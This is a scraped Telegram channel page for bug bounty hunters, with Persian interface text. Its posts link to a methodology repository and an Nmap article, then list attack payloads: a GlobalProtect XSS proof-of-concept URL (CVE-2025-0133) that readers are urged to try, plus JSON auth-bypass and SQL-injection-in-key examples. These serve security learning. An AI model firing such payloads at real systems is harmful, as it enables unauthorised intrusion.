Bug Bounty - GitBook
رفتن به کانال در Telegram
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
نمایش بیشتر7 429
مشترکین
+424 ساعت
+207 روز
+16430 روز
آرشیو پست ها
7 431
🚨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
✅ Download: https://github.com/alihussainzada/BugHunterMethodology/
7 431
Vulnerability Scanning with Nmap - Black Hills Information Security, Inc. https://www.blackhillsinfosec.com/vulnerability-scanning-with-nmap/
7 431
The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs.
Try your luck by running this PoC
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
http://GitBook_s.t.me7 431
سلام بچه ها
ما یه تاپیک زدیم با بچه های امنیت که صرفا از دست حواشی خلاص بشیم و مسیر یادگیری رو بدون پیچ و خم جلو ببریم
از شما دوستان دعوت میکنم به خانواده ما بپیوندید
@sec_gap 👈👈👈
در صورتی که تو جمع خودمون ببینمتون خوشحال میشم ❤️
7 431
1) Check request JSON for empty data/array.
Auth Bypass Example
❌ {"login":"user", "pass":"asd"}
✅ {} or {"_":"_"}
2) check for SQL Injection in JSON keys
SQL injection Example
✅ {"login\" or 1=1 -- -":"user"}
🔗 Article Link
https://liveoverflow.com/authentication-bypassing-in-codeigniter-due-to-empty-where-clause/
@GitBook_s
7 431
عزیزانی ک پادکست ها رو گوش کردید
دو هفته گذشته
گوش کردید
خوشتون اومد
نظر بدید
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
